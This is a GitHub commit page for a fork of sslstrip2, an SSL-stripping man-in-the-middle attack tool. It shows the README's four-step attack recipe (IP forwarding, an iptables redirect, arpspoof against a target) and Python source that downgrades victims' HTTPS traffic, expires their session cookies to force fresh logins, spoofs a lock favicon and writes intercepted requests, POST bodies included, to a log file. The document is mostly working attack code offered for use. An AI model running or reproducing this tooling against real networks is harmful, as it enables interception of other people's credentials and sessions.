forked from LeonardoNve/sslstrip2
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
0 parents
commit 8b57759
Showing
47 changed files
with
3,507 additions
and
0 deletions.
There are no files selected for viewing
Large diffs are not rendered by default.
Oops, something went wrong.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,32 @@ | ||
sslstrip is a MITM tool that implements Moxie Marlinspike's SSL stripping | ||
attacks. | ||
|
||
It requires Python 2.5 or newer, along with the 'twisted' python module. | ||
|
||
Installing: | ||
* Unpack: tar zxvf sslstrip-0.5.tar.gz | ||
* Install twisted: sudo apt-get install python-twisted-web | ||
* (Optionally) run 'python setup.py install' as root to install, | ||
or you can just run it out of the directory. | ||
|
||
Running: | ||
sslstrip can be run from the source base without installation. | ||
Just run 'python sslstrip.py -h' as a non-root user to get the | ||
command-line options. | ||
|
||
The four steps to getting this working (assuming you're running Linux) | ||
are: | ||
|
||
1) Flip your machine into forwarding mode (as root): | ||
echo "1" > /proc/sys/net/ipv4/ip_forward | ||
|
||
2) Setup iptables to intercept HTTP requests (as root): | ||
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <yourListenPort> | ||
|
||
3) Run sslstrip with the command-line options you'd like (see above). | ||
|
||
4) Run arpspoof to redirect traffic to your machine (as root): | ||
arpspoof -i <yourNetworkdDevice> -t <yourTarget> <theRoutersIpAddress> | ||
|
||
More Info: | ||
http://www.thoughtcrime.org/software/sslstrip/ |
Empty file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,203 @@ | ||
# Copyright (c) 2004-2009 Moxie Marlinspike | ||
# | ||
# This program is free software; you can redistribute it and/or | ||
# modify it under the terms of the GNU General Public License as | ||
# published by the Free Software Foundation; either version 3 of the | ||
# License, or (at your option) any later version. | ||
# | ||
# This program is distributed in the hope that it will be useful, but | ||
# WITHOUT ANY WARRANTY; without even the implied warranty of | ||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU | ||
# General Public License for more details. | ||
# | ||
# You should have received a copy of the GNU General Public License | ||
# along with this program; if not, write to the Free Software | ||
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 | ||
# USA | ||
# | ||
|
||
import urlparse, logging, os, sys, random, re | ||
|
||
from twisted.web.http import Request | ||
from twisted.web.http import HTTPChannel | ||
from twisted.web.http import HTTPClient | ||
|
||
from twisted.internet import ssl | ||
from twisted.internet import defer | ||
from twisted.internet import reactor | ||
from twisted.internet.protocol import ClientFactory | ||
|
||
from ServerConnectionFactory import ServerConnectionFactory | ||
from ServerConnection import ServerConnection | ||
from SSLServerConnection import SSLServerConnection | ||
from URLMonitor import URLMonitor | ||
from CookieCleaner import CookieCleaner | ||
from DnsCache import DnsCache | ||
|
||
class ClientRequest(Request): | ||
|
||
''' This class represents incoming client requests and is essentially where | ||
the magic begins. Here we remove the client headers we dont like, and then | ||
respond with either favicon spoofing, session denial, or proxy through HTTP | ||
or SSL to the server. | ||
''' | ||
|
||
def __init__(self, channel, queued, reactor=reactor): | ||
Request.__init__(self, channel, queued) | ||
self.reactor = reactor | ||
self.urlMonitor = URLMonitor.getInstance() | ||
self.cookieCleaner = CookieCleaner.getInstance() | ||
self.dnsCache = DnsCache.getInstance() | ||
# self.uniqueId = random.randint(0, 10000) | ||
|
||
def cleanHeaders(self): | ||
headers = self.getAllHeaders().copy() | ||
|
||
if 'accept-encoding' in headers: | ||
del headers['accept-encoding'] | ||
|
||
if 'referer' in headers: | ||
real = self.urlMonitor.real | ||
if len(real)>0: | ||
dregex = re.compile("(%s)" % "|".join(map(re.escape, real.keys()))) | ||
headers['referer'] = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), headers['referer']) | ||
|
||
if 'if-modified-since' in headers: | ||
del headers['if-modified-since'] | ||
|
||
if 'cache-control' in headers: | ||
del headers['cache-control'] | ||
|
||
if 'if-none-match' in headers: | ||
del headers['if-none-match'] | ||
|
||
if 'host' in headers: | ||
host = self.urlMonitor.URLgetRealHost("%s"%headers['host']) | ||
logging.debug("Modifing HOST header: %s -> %s"%(headers['host'],host)) | ||
headers['host'] = host | ||
headers['securelink'] = '1' | ||
self.setHeader('Host',host) | ||
|
||
return headers | ||
|
||
def getPathFromUri(self): | ||
if (self.uri.find("http://") == 0): | ||
index = self.uri.find('/', 7) | ||
return self.uri[index:] | ||
|
||
return self.uri | ||
|
||
|
||
def getPathToLockIcon(self): | ||
if os.path.exists("lock.ico"): return "lock.ico" | ||
|
||
scriptPath = os.path.abspath(os.path.dirname(sys.argv[0])) | ||
scriptPath = os.path.join(scriptPath, "../share/sslstrip/lock.ico") | ||
|
||
if os.path.exists(scriptPath): return scriptPath | ||
|
||
logging.warning("Error: Could not find lock.ico") | ||
return "lock.ico" | ||
|
||
def save_req(self,lfile,str): | ||
f = open(lfile,"a") | ||
f.write(str) | ||
f.close() | ||
|
||
def handleHostResolvedSuccess(self, address): | ||
headers = self.cleanHeaders() | ||
# for header in headers: | ||
# logging.debug("HEADER %s = %s",header,headers[header]) | ||
logging.debug("Resolved host successfully: %s -> %s" % (self.getHeader('host').lower(), address)) | ||
lhost = self.getHeader("host").lower() | ||
host = self.urlMonitor.URLgetRealHost("%s"%lhost) | ||
client = self.getClientIP() | ||
path = self.getPathFromUri() | ||
self.content.seek(0,0) | ||
postData = self.content.read() | ||
real = self.urlMonitor.real | ||
patchDict = self.urlMonitor.patchDict | ||
|
||
if len(real)>0: | ||
dregex = re.compile("(%s)" % "|".join(map(re.escape, real.keys()))) | ||
path = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), path) | ||
postData = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), postData) | ||
if len(patchDict)>0: | ||
dregex = re.compile("(%s)" % "|".join(map(re.escape, patchDict.keys()))) | ||
postData = dregex.sub(lambda x: str(patchDict[x.string[x.start() :x.end()]]), postData) | ||
|
||
url = 'http://' + host + path | ||
headers['content-length']="%d"%len(postData) | ||
|
||
self.dnsCache.cacheResolution(host, address) | ||
if (not self.cookieCleaner.isClean(self.method, client, host, headers)): | ||
logging.debug("Sending expired cookies...") | ||
self.sendExpiredCookies(host, path, self.cookieCleaner.getExpireHeaders(self.method, client, | ||
host, headers, path)) | ||
elif (self.urlMonitor.isSecureFavicon(client, path)): | ||
logging.debug("Sending spoofed favicon response...") | ||
self.sendSpoofedFaviconResponse() | ||
elif (self.urlMonitor.isSecureLink(client, url) or ('securelink' in headers)): | ||
if 'securelink' in headers: | ||
del headers['securelink'] | ||
logging.debug("LEO Sending request via SSL...(%s %s)"%(client,url)) | ||
self.proxyViaSSL(address, self.method, path, postData, headers, | ||
self.urlMonitor.getSecurePort(client, url)) | ||
else: | ||
logging.debug("LEO Sending request via HTTP...") | ||
self.proxyViaHTTP(address, self.method, path, postData, headers) | ||
|
||
def handleHostResolvedError(self, error): | ||
logging.warning("Host resolution error: " + str(error)) | ||
self.finish() | ||
|
||
def resolveHost(self, host): | ||
address = self.dnsCache.getCachedAddress(host) | ||
|
||
if address != None: | ||
logging.debug("Host cached.") | ||
return defer.succeed(address) | ||
else: | ||
logging.debug("Host not cached.") | ||
return reactor.resolve(host) | ||
|
||
def process(self): | ||
host = self.urlMonitor.URLgetRealHost("%s"%self.getHeader('host')) | ||
logging.debug("Resolving host: %s" % host) | ||
deferred = self.resolveHost(host) | ||
|
||
deferred.addCallback(self.handleHostResolvedSuccess) | ||
deferred.addErrback(self.handleHostResolvedError) | ||
|
||
def proxyViaHTTP(self, host, method, path, postData, headers): | ||
connectionFactory = ServerConnectionFactory(method, path, postData, headers, self) | ||
self.save_req("debug_ssl.log",method+' http://'+host+path+'\n'+str(headers)+'\n'+postData+'\n') | ||
connectionFactory.protocol = ServerConnection | ||
self.reactor.connectTCP(host, 80, connectionFactory) | ||
|
||
def proxyViaSSL(self, host, method, path, postData, headers, port): | ||
self.save_req("debug_ssl.log",method+' https://'+host+path+'\n'+str(headers)+'\n'+postData+'\n') | ||
clientContextFactory = ssl.ClientContextFactory() | ||
connectionFactory = ServerConnectionFactory(method, path, postData, headers, self) | ||
connectionFactory.protocol = SSLServerConnection | ||
self.reactor.connectSSL(host, port, connectionFactory, clientContextFactory) | ||
|
||
def sendExpiredCookies(self, host, path, expireHeaders): | ||
self.setResponseCode(302, "Moved") | ||
self.setHeader("Connection", "close") | ||
self.setHeader("Location", "http://" + host + path) | ||
|
||
for header in expireHeaders: | ||
self.setHeader("Set-Cookie", header) | ||
|
||
self.finish() | ||
|
||
def sendSpoofedFaviconResponse(self): | ||
icoFile = open(self.getPathToLockIcon()) | ||
|
||
self.setResponseCode(200, "OK") | ||
self.setHeader("Content-type", "image/x-icon") | ||
self.write(icoFile.read()) | ||
|
||
icoFile.close() | ||
self.finish() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,106 @@ | ||
# Copyright (c) 2004-2011 Moxie Marlinspike | ||
# | ||
# This program is free software; you can redistribute it and/or | ||
# modify it under the terms of the GNU General Public License as | ||
# published by the Free Software Foundation; either version 3 of the | ||
# License, or (at your option) any later version. | ||
# | ||
# This program is distributed in the hope that it will be useful, but | ||
# WITHOUT ANY WARRANTY; without even the implied warranty of | ||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU | ||
# General Public License for more details. | ||
# | ||
# You should have received a copy of the GNU General Public License | ||
# along with this program; if not, write to the Free Software | ||
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 | ||
# USA | ||
# | ||
|
||
import logging | ||
import string | ||
|
||
class CookieCleaner: | ||
'''This class cleans cookies we haven't seen before. The basic idea is to | ||
kill sessions, which isn't entirely straight-forward. Since we want this to | ||
be generalized, there's no way for us to know exactly what cookie we're trying | ||
to kill, which also means we don't know what domain or path it has been set for. | ||
The rule with cookies is that specific overrides general. So cookies that are | ||
set for mail.foo.com override cookies with the same name that are set for .foo.com, | ||
just as cookies that are set for foo.com/mail override cookies with the same name | ||
that are set for foo.com/ | ||
The best we can do is guess, so we just try to cover our bases by expiring cookies | ||
in a few different ways. The most obvious thing to do is look for individual cookies | ||
and nail the ones we haven't seen coming from the server, but the problem is that cookies are often | ||
set by Javascript instead of a Set-Cookie header, and if we block those the site | ||
will think cookies are disabled in the browser. So we do the expirations and whitlisting | ||
based on client,server tuples. The first time a client hits a server, we kill whatever | ||
cookies we see then. After that, we just let them through. Not perfect, but pretty effective. | ||
''' | ||
|
||
_instance = None | ||
|
||
def getInstance(): | ||
if CookieCleaner._instance == None: | ||
CookieCleaner._instance = CookieCleaner() | ||
|
||
return CookieCleaner._instance | ||
|
||
getInstance = staticmethod(getInstance) | ||
|
||
def __init__(self): | ||
self.cleanedCookies = set(); | ||
self.enabled = False | ||
|
||
def setEnabled(self, enabled): | ||
self.enabled = enabled | ||
|
||
def isClean(self, method, client, host, headers): | ||
if method == "POST": return True | ||
if not self.enabled: return True | ||
if not self.hasCookies(headers): return True | ||
|
||
return (client, self.getDomainFor(host)) in self.cleanedCookies | ||
|
||
def getExpireHeaders(self, method, client, host, headers, path): | ||
domain = self.getDomainFor(host) | ||
self.cleanedCookies.add((client, domain)) | ||
|
||
expireHeaders = [] | ||
|
||
for cookie in headers['cookie'].split(";"): | ||
cookie = cookie.split("=")[0].strip() | ||
expireHeadersForCookie = self.getExpireCookieStringFor(cookie, host, domain, path) | ||
expireHeaders.extend(expireHeadersForCookie) | ||
|
||
return expireHeaders | ||
|
||
def hasCookies(self, headers): | ||
return 'cookie' in headers | ||
|
||
def getDomainFor(self, host): | ||
hostParts = host.split(".") | ||
return "." + hostParts[-2] + "." + hostParts[-1] | ||
|
||
def getExpireCookieStringFor(self, cookie, host, domain, path): | ||
pathList = path.split("/") | ||
expireStrings = list() | ||
|
||
expireStrings.append(cookie + "=" + "EXPIRED;Path=/;Domain=" + domain + | ||
";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n") | ||
|
||
expireStrings.append(cookie + "=" + "EXPIRED;Path=/;Domain=" + host + | ||
";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n") | ||
|
||
if len(pathList) > 2: | ||
expireStrings.append(cookie + "=" + "EXPIRED;Path=/" + pathList[1] + ";Domain=" + | ||
domain + ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n") | ||
|
||
expireStrings.append(cookie + "=" + "EXPIRED;Path=/" + pathList[1] + ";Domain=" + | ||
host + ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n") | ||
|
||
return expireStrings | ||
|
||
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,28 @@ | ||
|
||
class DnsCache: | ||
|
||
''' | ||
The DnsCache maintains a cache of DNS lookups, mirroring the browser experience. | ||
''' | ||
|
||
_instance = None | ||
|
||
def __init__(self): | ||
self.cache = {} | ||
|
||
def cacheResolution(self, host, address): | ||
self.cache[host] = address | ||
|
||
def getCachedAddress(self, host): | ||
if host in self.cache: | ||
return self.cache[host] | ||
|
||
return None | ||
|
||
def getInstance(): | ||
if DnsCache._instance == None: | ||
DnsCache._instance = DnsCache() | ||
|
||
return DnsCache._instance | ||
|
||
getInstance = staticmethod(getInstance) |
Oops, something went wrong.